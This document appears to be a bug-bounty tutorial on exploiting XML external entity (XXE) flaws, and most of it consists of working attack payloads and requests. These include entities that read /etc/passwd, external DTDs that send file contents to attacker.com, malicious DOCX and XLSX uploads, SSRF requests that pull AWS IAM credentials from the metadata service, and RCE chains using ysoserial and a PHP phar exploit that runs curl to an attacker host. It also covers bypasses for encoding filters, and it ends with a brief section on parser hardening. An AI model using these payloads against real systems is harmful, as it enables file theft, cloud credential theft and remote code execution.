Imagine uploading an innocent-looking XML file to a web application’s import feature, only to receive the server’s /etc/passwd file in the response moments later. Or submitting a DOCX resume that silently extracts AWS credentials from the cloud metadata service.
These are real-world XXE (XML external entity) attacks – exploiting a powerful class of vulnerabilities that hunters exploit to uncover critical security flaws in production applications.
XXE exploits abuse the way XML parsers process external entity references, transforming standard XML functionality into an attack vector for sensitive file disclosure, internal network reconnaissance and even denial-of-service. This guide explores the main XXE vulnerability types and demonstrates practical exploitation techniques with real-world scenarios.
So what is XML external entity (XXE)?
In simple terms, XXE occurs when an application parses XML input from untrusted sources without properly configuring its XML parser to prevent the processing of external entities.
Consider this example: you’re using a web application that accepts XML data for an import feature – perhaps for product catalogs, configuration files or API requests. The application expects legitimate XML, but what happens when you inject malicious entity declarations?
An XXE attack exploits the XML parser’s built-in capability to reference external resources. By crafting XML with special entity declarations pointing to local files (like /etc/passwd) or remote endpoints (like internal services), an attacker can trick the parser into accessing resources it shouldn’t.
The vulnerability stems from XML’s entity system – a feature designed to allow reusable content within documents. External entities extend this by enabling references to resources via uniform resource identifiers (URIs). When applications fail to restrict this functionality, attackers can weaponise it to read arbitrary files, probe internal networks or trigger resource exhaustion.
If a site lacks robust XXE protections, an attacker can manipulate XML input to extract database credentials, access application source code, read cloud instance metadata or even achieve remote code execution (RCE) in specific configurations.
Understanding XML parsers in web applications
Before diving into exploitation, it’s important to understand where XML parsers lurk in modern applications – because XXE vulnerabilities don’t just exist in obvious XML endpoints.
An XML parser is a software component that reads XML data and converts it into a format applications can work with. Every programming language has XML parsing libraries: Java uses DOM and SAX parsers, Python has lxml and xml.etree, PHP uses libxml. The problem? Most of these parsers come with dangerous features enabled by default, including external entity processing.
Where parsers hide
XML parsers appear in unexpected places throughout modern applications:
- Document processing systems that accept DOCX, XLSX or PPTX uploads use XML parsers behind the scenes – these Microsoft Office formats are actually ZIP archives containing XML files. A resume-screening platform parsing DOCX resumes, an invoice system processing XLSX spreadsheets or a presentation converter handling PPTX files all rely on XML parsers.
- API endpoints often support multiple content types. A JSON API using frameworks like Spring Boot or Express might automatically invoke an XML parser when you switch the
Content-Typeheader fromapplication/jsontoapplication/xml– even if the developers never intended to support XML. - Legacy SOAP services are inherently XML-based. Many enterprise systems maintain SOAP endpoints for backward compatibility or integration with older systems, and these services parse XML with every request.
- SVG image processors parse Scalable Vector Graphics (SVG) as XML. Upload an avatar, submit a logo or process any SVG file and an XML parser is invoked.
The key insight? You don’t need to see <xml> in the documentation to find XML parsers. They’re embedded throughout the application stack, quietly processing data in formats you might not immediately recognise as XML-based.
Why XML parsers can be vulnerable
The vulnerability stems from how XML parsers handle external entities – a feature that becomes dangerous when explicitly enabled or when using legacy configurations.
When an XML parser encounters an entity reference like &xxe;, it looks up the entity definition in the DOCTYPE declaration. If that entity is defined as SYSTEM "file:///etc/passwd" and external entity processing is enabled, the parser fetches and substitutes the file’s contents.
Most modern XML parsing libraries have external entity processing disabled by default for security reasons. Libraries like Python’s xml.etree, Java’s DocumentBuilderFactory (in recent versions) and PHP’s libxml ship with secure defaults that reject external entities unless explicitly configured otherwise or bypassed through CVEs.
So where do XXE vulnerabilities come from? Several scenarios create exposure:
- Legacy code and outdated libraries still running on old versions where external entities were enabled by default. Applications deployed years ago may have never updated their XML processing dependencies.
- Explicit enabling of dangerous features when developers need specific XML functionality and unknowingly enable external entity processing. This often happens when following outdated tutorials or Stack Overflow answers that don’t emphasise security implications.
- Custom XML configurations where developers override secure defaults without understanding the risks. A simple
setFeature("http://xml.org/sax/features/external-general-entities", true)reopens the vulnerability. - Third-party libraries and frameworks that internally enable external entity processing for their own functionality, exposing applications that depend on them.
This is why XXE remains relevant – not because parsers are vulnerable by default, but because misconfigurations, legacy systems and enabling of explicit features still creates attack surface in production applications.
How XXE attacks work – step-by-step
A successful XXE attack follows this pattern:
- The attacker identifies an application endpoint that accepts and processes XML input
- The attacker crafts malicious XML containing external entity declarations
- The malicious payload is submitted through the vulnerable input (API, file upload, import feature)
- The XML parser processes the input and resolves the external entity references
- The parser accesses the specified resource (local file, remote endpoint, etc)
- The application either returns the accessed data directly or the attacker uses alternative techniques to retrieve it
Impact of XXE vulnerabilities
The severity of XXE vulnerabilities can be substantial. At minimum, successful exploitation enables arbitrary file read access – exposing configuration files, application source code and sensitive system files like /etc/passwd or C:\boot.ini.
Beyond file disclosure, XXE can facilitate Server-Side Request Forgery (SSRF) attacks against internal infrastructure, allowing attackers to probe internal networks, access cloud metadata endpoints (particularly dangerous in AWS/Azure/GCP environments) or interact with internal services that should never be externally accessible.
In severe cases, XXE can lead to remote code execution when combined with specific features (like PHP’s expect:// wrapper) or trigger denial-of-service via resource exhaustion, notably through the ‘Billion Laughs’ attack. For Bug Bounty hunters, XXE vulnerabilities typically command high or critical severity ratings – particularly when you can demonstrate impact through sensitive file disclosure or internal network access.
Classic XXE attacks
A classic XXE vulnerability occurs when an attacker can inject external entity declarations into XML input that directly retrieve and display sensitive data within the application’s response.
To exploit this:
- The attacker crafts an XML document with a DOCTYPE declaration defining an external entity
- This entity references a target resource using protocols like
file://for local files - The entity is referenced within the XML body where the parser will substitute its value
- When the application processes and returns the parsed XML, the contents of the referenced resource are exposed
Classic XXE is the most straightforward variant to exploit since the exfiltrated data appears directly in the application’s response. However, it requires that the application reflects parsed XML content back to the user – a pattern common in APIs, data import features and services that process and display XML.
Classic XXE scenario
Imagine you’re testing an e-commerce platform’s product import API at /api/products/import. The feature allows administrators to bulk upload products via XML files.
Standard legitimate request:
1POST /api/products/import HTTP/1.12Host: shop.example.com3Content-Type: application/xml45<?xml version="1.0" encoding="UTF-8"?>6<products>7<product>8<name>Laptop Pro 15</name>9<price>1299.99</price>10<category>Electronics</category>11</product>12</products>
You modify this request to test for XXE by injecting an external entity declaration:
1<?xml version="1.0" encoding="UTF-8"?>2<!DOCTYPEproducts[3<!ENTITYxxe SYSTEM "file:///etc/passwd">4]>5<products>6<product>7<name>&xxe;</name>8<price>999</price>9<category>Test</category>10</product>11</products>
If the application is vulnerable, the XML parser resolves the &xxe; entity by reading /etc/passwd from the server’s filesystem. The API response reflects this content:
1{2"status":"success",3"imported":1,4"products":[5{6"name":"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\n...",7"price":"999",8"category":"Test"9}10]11}
The application has just handed you the contents of a sensitive system file – and, surely, a critical vulnerability.
Blind XXE with out-of-band techniques
Blind XXE vulnerabilities occur when the application parses external entities but doesn’t reflect the retrieved data in its responses. This is actually more common in production environments than classic XXE.
In blind scenarios, attackers must use out-of-band (OOB) techniques to confirm the vulnerability and exfiltrate data. This approach involves setting up an attacker-controlled server to receive callbacks, crafting XML that references an external DTD (Document Type Definition) hosted on your server, and monitoring server logs for incoming connections. Even if the application doesn’t display parsed content, the XML parser still makes outbound connections to resolve external entities – connections you can observe and control.
Blind XXE requires more sophisticated exploitation but is prevalent in applications that process XML without displaying results, such as backend processing systems, document converters or asynchronous import features.
Blind XXE scenario
You’re pentesting a document conversion service at docs.company.com that accepts XML files and converts them to PDF format. The service provides only a success message and download link – no parsed content is displayed.
First, you set up infrastructure on your virtual private server at attacker.com. You create a malicious DTD file:
evil.dtd (hosted at http://attacker.com/evil.dtd):
1<!ENTITY % file SYSTEM "file:///etc/hostname">2<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/log?data=%file;'>">3%eval;4%exfil;
Then you craft the initial XML payload:
1POST /api/convert HTTP/1.12Host: docs.company.com3Content-Type: application/xml45<?xml version="1.0" encoding="UTF-8"?>6<!DOCTYPEroot[7<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">8%xxe;9]>10<document>11<title>Quarterly Report</title>12<content>Test content</content>13</document>
Here’s what happens behind the scenes: the application’s XML parser processes your payload and resolves the external entity reference to http://attacker.com/evil.dtd. The parser fetches your malicious DTD file. The DTD defines %file entity, which reads /etc/hostname. Then the %eval entity creates another entity that triggers a HTTP request containing the file contents. Your server receives GET /log?data=prod-docs-01 HTTP/1.1.
Even though the application never displays the parsed content, your server logs reveal the hostname – confirming both the vulnerability and successful data exfiltration.
Error-based XXE exploitation
When traditional blind XXE with out-of-band exfiltration isn’t possible – perhaps due to egress filtering or network restrictions – error-based XXE provides an alternative approach. This technique forces the XML parser to generate error messages that include sensitive data, which the application then displays to the user.
The key is to trigger a parsing error that includes the content you want to exfiltrate. This is typically done by referencing a non-existent file path that contains the data you’ve read. The parser throws an error like File not found: /nonexistent/root:x:0:0:… and the application helpfully returns this error message to you.
Error-based XXE with local DTD
One powerful error-based technique leverages DTD files that already exist on the target server. Most Linux systems have several DTD files in predictable locations like /usr/share/xml/fontconfig/fonts.dtd or /usr/share/yelp/dtd/docbookx.dtd. These files contain entity definitions that you can hijack.
GoSecure published a comprehensive list of common DTD file paths across different operating systems and applications.
If you’ve fingerprinted the target system during reconnaissance and identified the operating system, you can also use GoSecure’s dtd-finder tool to automate local discovery and determine which DTD files are available on similar configurations.
For example, /usr/share/xml/fontconfig/fonts.dtd contains an entity %constant that you can redefine:
1<?xml version="1.0"?>2<!DOCTYPEmessage[3<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">4<!ENTITY % constant 'aaa)>5<!ENTITY % file SYSTEM "file:///etc/passwd">6<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">7%eval;8%error;9<!ELEMENT aa (bb'>10%local_dtd;11]>12<message>anything</message>
This payload loads the local DTD file, redefines the %constant entity to include your malicious entity definitions, reads /etc/passwd into %file, creates an %error entity that references a non-existent path with the file contents and triggers the error. The application returns an error message like:
1XML parsing error: file:///nonexistent/root:x:0:0:root:/root:/bin/bash (No such file or directory)
The error message contains the exfiltrated data. This technique works even when outbound connections are blocked, making it extremely valuable in restricted environments.
Error-based XXE with remote DTD
When you control an external server and can make the target fetch your DTD, error-based XXE becomes even more flexible. Let’s say you submit this initial payload:
1<?xml version="1.0"?>2<!DOCTYPEroot[3<!ENTITY % ext SYSTEM "http://attacker.com/evil.dtd">4%ext;5]>6<root></root>78Your evil.dtd file contains:910<!ENTITY % file SYSTEM "file:///etc/passwd">11<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">12%eval;13%error;
The parser then fetches your DTD, attempts to load a non-existent file with the contents of /etc/passwd in the path and generates an error that leaks the data. The application displays Error: file:///nonexistent/root:x:0:0:root:/root:/bin/bash not found.
Error-based XXE is particularly effective in Bug Bounty scenarios where you need to demonstrate impact quickly, without setting up complex out-of-band exfiltration infrastructure.
XXE via file upload functionality
File upload features represent a frequently overlooked XXE attack surface. Many applications process XML-based file formats without developers realising the security implications. Commonly vulnerable file types include Office documents (DOCX, XLSX, PPTX), which are ZIP archives containing XML files, as well as SVG images, which are XML-based.
Vulnerabilities emerges when applications extract and parse these files server-side for purposes like thumbnail generation, metadata extraction, content indexing or format conversion. Among these formats, XLSX files deserve special attention because they’re commonly processed by automated systems – from invoice processors to HR platforms parsing uploaded resumes or financial reports.
Weaponising XLSX files with XXElixir
For Bug Bounty hunters testing XLSX file uploads, XXElixir is an invaluable tool that automates the injection of XXE payloads into Excel files. Rather than manually unzipping archives, modifying XML files and repackaging them, XXElixir streamlines the workflow. For example:
1python3 XXElixir.py --file template.xlsx --url https://attacker.com/xxe --output poisoned.xlsx
Or with a custom XXE payload:
1python3 XXElixir.py --file template.xlsx --xxe"<!DOCTYPE root [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>"--output poisoned.xlsx
The tool works by extracting the XLSX archive, injecting your payload into xl/workbook.xml and repackaging everything into a valid Excel file that applications will process normally.
Testing with Canarytokens
Before diving into full exploitation, it’s often wise to test whether an application actually processes your uploaded XLSX files. Canarytokens provides MS Excel tokens that alert you when the file is opened. However, if you upload a canarytoken XLSX and never receive an alert, this often indicates the file is being processed by a command-line parser rather than being opened in Microsoft Excel.
This is actually good news for XXE testing. Command-line parsers and libraries (like Apache POI for Java, openpyxl for Python or EPPlus for .NET) often process XML with fewer security restrictions than desktop applications. If your canarytoken isn’t triggered but the file is accepted and processed, there’s a strong chance that an XXE-vulnerable parser is at work behind the scenes.
File upload XXE scenario
Let’s examine a practical scenario. You’re testing a job application portal at careers.company.com that accepts resume uploads in the DOCX format. The system extracts text from resumes for keyword matching and displays a formatted preview.
To exploit this, you create a weaponised DOCX file. Start with a legitimate DOCX resume then unzip it: unzip resume.docx -d resume_modified/. Locate and edit word/document.xml:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPEw:document[
<!ENTITYxxe SYSTEM "file:///etc/passwd">
]>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:body>
<w:p>
<w:r>
<w:t>Professional Summary: &xxe;</w:t>
</w:r>
</w:p>
</w:body>
</w:document>
Repackage the file with cd resume_modified && zip -r ../malicious_resume.docx *, then upload malicious_resume.docx through the application. When the resume parsing system processes your file to generate a preview, the XXE payload executes. The resume preview displays:
1Professional Summary: root:x:0:0:root:/root:/bin/bash2daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin3bin:x:2:2:bin:/bin:/usr/sbin/nologin4sys:x:3:3:sys:/dev:/usr/sbin/nologin5...
The application has inadvertently exposed the server’s password file through an ostensibly innocent resume upload.
For XLSX files, the process is similar, but you’d modify xl/workbook.xml or xl/sharedStrings.xml. Using XXElixir, this entire process becomes trivial – perfect for rapid Bug Bounty testing where you need to test multiple upload endpoints efficiently.
XXE through Content-Type manipulation
One of the most overlooked XXE attack vectors involves exploiting applications that accept multiple content types. Many modern APIs are designed to handle both JSON and XML, but developers often only implement security controls for the expected format.
The attack works by switching the Content-Type header from application/json to application/xml or text/xml, then submitting XML payloads to endpoints that normally expect JSON. Surprisingly, many frameworks will automatically parse and process the XML if the parser is available, even when JSON is the documented format.
Content-Type switching scenario
Imagine you’re testing an API endpoint at https://api.example.com/users/update that accepts JSON for updating user profiles:
1POST /users/update HTTP/1.12Host: api.example.com3Content-Type: application/json45{6"username": "john_doe",7"email": "john@example.com",8"bio": "Software developer"9}
Standard testing might miss that this endpoint also accepts XML. So try switching the Content-Type:
1POST /users/update HTTP/1.12Host: api.example.com3Content-Type: application/xml45<?xml version="1.0" encoding="UTF-8"?>6<!DOCTYPE root [7<!ENTITY xxe SYSTEM "file:///etc/passwd">8]>9<root>10<username>john_doe</username>11<email>john@example.com</email>12<bio>&xxe;</bio>13</root>
If the application’s backend framework (such as Spring, Laravel or Express) has XML parsing capabilities enabled, it may automatically deserialize your XML input. The parser resolves the &xxe; entity and suddenly you’re reading server files through an endpoint that “only accepts JSON”.
This technique is particularly effective against REST APIs that use frameworks with automatic content negotiation. Many developers assume their JSON-only API is safe from XXE, never realising that simply changing the Content-Type header can expose XML parsing functionality.
XXE for server-side request forgery (SSRF)
XXE vulnerabilities can be leveraged to perform SSRF attacks and provide your server with access to internal resources that should be unreachable from the outside.
By using HTTP or other protocol schemes in external entity declarations, you can force the XML parser to make requests to arbitrary endpoints. This is particularly powerful because requests originate from the server itself (a trusted source), internal network resources become accessible, cloud metadata endpoints can be queried, and firewall rules and network segmentation may not block server-to-server traffic.
XXE to SSRF scenario
Let’s say you’ve discovered an XXE vulnerability in an application running on AWS EC2. You can leverage this to access the AWS metadata service – a goldmine of sensitive information including temporary IAM credentials.
First, you probe to confirm access to the metadata service:
1<?xml version="1.0" encoding="UTF-8"?>2<!DOCTYPEroot[3<!ENTITYxxe SYSTEM "http://169.254.169.254/latest/meta-data/">4]>5<request>6<data>&xxe;</data>7</request>
The response reveals available metadata paths, including iam/, confirming the server can access the metadata service.
Next, you enumerate available IAM roles:
1<?xml version="1.0" encoding="UTF-8"?>2<!DOCTYPEroot[3<!ENTITYxxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">4]>5<request>6<data>&xxe;</data>7</request>
The response to this request is web-application-role, the name of the IAM role attached to the EC2 instance.
Finally, you extract the temporary credentials:
1<?xml version="1.0" encoding="UTF-8"?>2<!DOCTYPEroot[3<!ENTITYxxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/web-application-role">4]>5<request>6<data>&xxe;</data>7</request>
And voila: the application returns…
1{2"Code":"Success",3"AccessKeyId":"ASIA...",4"SecretAccessKey":"wJalrXUtnFEMI...",5"Token":"IQoJb3JpZ2luX2...",6"Expiration":"2025-12-15T18:30:00Z"7}
…you’ve just extracted temporary AWS credentials with all the permissions assigned to that IAM role – a critical finding that could lead to complete cloud infrastructure compromise.
XXE to remote code execution (RCE)
While XXE vulnerabilities typically lead to file disclosure or SSRF, certain configurations can escalate them to full remote code execution. RCE through XXE is rare but devastating when discovered.
Java XXE to RCE via deserialization
The most powerful XXE-to-RCE technique exploits Java applications that combine XML processing with file upload functionality. This attack chain leverages unsafe Java deserialization.
How it works
- Upload a malicious serialised Java object
- Use XXE to reference the uploaded file
- Java deserialises the object automatically, triggering code execution
Practical exploitation
Step 1: Generate the payload with ysoserial:
1java-jar ysoserial.jar CommonsCollections6 'curl http://attacker.com/pwned'> payload.ser
Step 2: Upload the malicious file:
Upload payload.ser through any file upload feature:
1POST /api/attachments/upload HTTP/1.12Content-Type: multipart/form-data34[serialised object content]56Response: {"file_id": "12345", "path": "/uploads/12345/payload.ser"}
Step 3: Trigger deserialization via XXE:
1<?xml version="1.0" encoding="UTF-8"?>2<!DOCTYPEroot[3<!ENTITYxxe SYSTEM "file:///app/uploads/12345/payload.ser">4]>5<request>6<data>&xxe;</data>7</request>
When the XML parser reads your serialised object, Java automatically deserializes it and executes your payload.
PHP phar:// deserialization
PHP applications can achieve similar results using the phar:// protocol.
For quick exploitation, create a malicious PHAR:
1<?php2class Exploit {3publicfunction__destruct() {4system('curl http://attacker.com/pwned');5}6}78$phar=newPhar('exploit.phar');9$phar->startBuffering();10$phar->addFromString('test.txt','test');11$phar->setStub('<?php __HALT_COMPILER(); ?>');12$phar->setMetadata(new Exploit());13$phar->stopBuffering();14?>
Then upload and trigger:
1<?xml version="1.0" encoding="UTF-8"?>2<!DOCTYPEroot[3<!ENTITYxxe SYSTEM "phar:///var/www/uploads/exploit.phar">4]>5<data>&xxe;</data>
PHP expect:// wrapper
The simplest RCE vector is when the PHP expect extension is enabled:
1<?xml version="1.0" encoding="UTF-8"?>2<!DOCTYPEroot[3<!ENTITYxxe SYSTEM "expect://id">4]>5<root>&xxe;</root>
XXE-to-RCE represents an ideal scenario for critical Bug Bounty findings, where a parser-level vulnerability translates directly into maximum real-world impact. The key is recognising when file upload functionality and XML processing intersect, creating the perfect conditions for exploitation.
Advanced XXE bypass methods
XXE defences vary widely in sophistication, and many can be circumvented through encoding tricks and alternative attack vectors.
Bypassing input validation filters
Many applications implement naive keyword blacklists that can be defeated through encoding and obfuscation.
UTF-16 encoding bypass
If the application filters XML keywords in ASCII, convert your payload to UTF-16:
1cat payload.xml |iconv-f UTF-8 -t UTF-16BE > utf16_payload.xml
The XML parser will still process it correctly, but ASCII-based filters won’t detect the malicious content.
This technique exploits the fact that XML parsers must support multiple encodings, but many security filters only inspect ASCII. For a deeper dive into exotic XML encoding attacks and edge cases, check out mohemiv’s ‘Evil XML’ writeup, which covers advanced encoding tricks that bypass WAFs.
HTML entity encoding
Encode characters within entity references to evade simple pattern matching:
1<!DOCTYPEroot[2<!ENTITYxxe SYSTEM "file:///etc/passwd">3]>
The / sequences decode to forward slashes, bypassing filters that look for literal /etc/passwd strings.
Parameter entity indirection
When direct ENTITY declarations are blocked, use parameter entities to introduce them indirectly:
1<!DOCTYPEroot[2<!ENTITY % dtd SYSTEM "http://attacker.com/bypass.dtd">3%dtd;4]>
Your external DTD (bypass.dtd) then contains the actual malicious entities that weren’t present in the initial payload.
XXE in uncommon content types
Don’t limit your testing to obvious Content-Type: application/xml requests. XML parsers often process content regardless of the declared content type.
SVG images
1POST /api/avatar/upload HTTP/1.12Host: example.com3Content-Type: image/svg+xml45<?xml version="1.0" standalone="yes"?>6<!DOCTYPEsvg[7<!ENTITYxxe SYSTEM "file:///etc/hostname">8]>9<svg width="500" height="500" xmlns="http://www.w3.org/2000/svg">10<text x="20" y="35" font-size="16">&xxe;</text>11</svg>
Many image processing libraries parse SVG as XML, making them vulnerable to XXE.
SOAP endpoints
Some REST APIs maintain legacy SOAP support. Try switching to SOAP format:
1POST /api/users HTTP/1.12Host: example.com3Content-Type: text/xml45<?xml version="1.0"?>6<!DOCTYPEsoap:Envelope[7<!ENTITYxxe SYSTEM "file:///etc/passwd">8]>9<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">10<soap:Body>11<getUserInfo>&xxe;</getUserInfo>12</soap:Body>13</soap:Envelope>
XInclude attacks when DOCTYPE is restricted
Some applications implement protections that prevent you from controlling the DOCTYPE declaration entirely – for example, by stripping it from user input or using XML parsers configured to reject custom DOCTYPEs. In these cases, XInclude attacks provide an alternative exploitation path.
XInclude is an XML feature that allows the inclusion of external XML documents or resources without requiring DOCTYPE declarations. If the application’s XML parser supports XInclude (which many do by default), you can bypass DOCTYPE-based defences like so:
1<data xmlns:xi="http://www.w3.org/2001/XInclude">2<xi:include href="file:///etc/passwd" parse="text"/>3</data>
The parse="text" attribute is crucial, as it tells the parser to treat the included content as plaintext rather than XML, preventing parsing errors when reading files that aren’t valid XML (like /etc/passwd).
For remote file inclusion or SSRF via XInclude:
1<data xmlns:xi="http://www.w3.org/2001/XInclude">2<xi:include href="http://internal.company.com/admin"/>3</data>
XInclude attacks are particularly effective against applications that sanitise or validate XML input before processing, since they don’t rely on DOCTYPE declarations that trigger many security filters.
XXE prevention and mitigation best practices
How can developers protect against XXE attacks? Several proven strategies can eliminate or significantly reduce the risk.
The gold standard is disabling external entity processing entirely at the parser level. This configuration varies by language and XML library but should always be your primary defence.
Java (DocumentBuilderFactory):
1DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();2dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);3dbf.setFeature("http://xml.org/sax/features/external-general-entities",false);4dbf.setFeature("http://xml.org/sax/features/external-parameter-entities",false);5dbf.setXIncludeAware(false);6dbf.setExpandEntityReferences(false);
Python (using defusedxml):
1from defusedxml import ElementTree as ET2tree = ET.parse('untrusted.xml')# Safe by default
PHP (libxml):
1libxml_disable_entity_loader(true);2$doc=simplexml_load_string($xml,'SimpleXMLElement',LIBXML_NOENT);
Input validation should implement strict allowlists rather than blocklists. Architectural decisions matter too. When possible, avoid XML altogether; JSON has become the standard for APIs and doesn’t suffer from XXE vulnerabilities. If XML is required for specific use cases, use it only for trusted internal communications and stick to simpler formats like JSON for user input.
Finally, implement defense in depth: network segmentation limits SSRF impact, least-privilege IAM policies reduce credential theft damage, and proper error handling prevents information disclosure even when parsers misbehave.
Conclusion
XXE vulnerabilities remain a serious threat to modern applications, despite growing awareness and improved framework defaults. The complexity of XML processing, legacy system requirements and developer misconfigurations ensure that XXE continues to surface regularly in Bug Bounty Programs.
What makes XXE particularly valuable for hunters is its versatility – ranging from straightforward file disclosure to complex SSRF attacks that expose cloud credentials or internal infrastructure. A single XXE vulnerability can provide the initial foothold for demonstrating severe security impact.
The techniques in this guide give you a practical framework for XXE testing. Remember that demonstrating impact is particularly crucial for justifying your severity assessment: reading /etc/passwd proves the vulnerability, but extracting AWS credentials or accessing internal admin panels demonstrates real-world risk!
As you hunt for XXE, expand your testing beyond obvious XML endpoints. Check file upload features for XML-based formats like DOCX and XLSX using tools like XXElixir, probe APIs for legacy SOAP support and Content-Type switching vulnerabilities, test document processing systems with canarytokens to identify command-line parsers, and always try encoding variations when facing filters.
XXE hunting requires patience and creativity, but the combination of technical depth and significant real-world impact makes XXE a rewarding vulnerability class for Bug Bounty hunters.
Happy hunting! o/



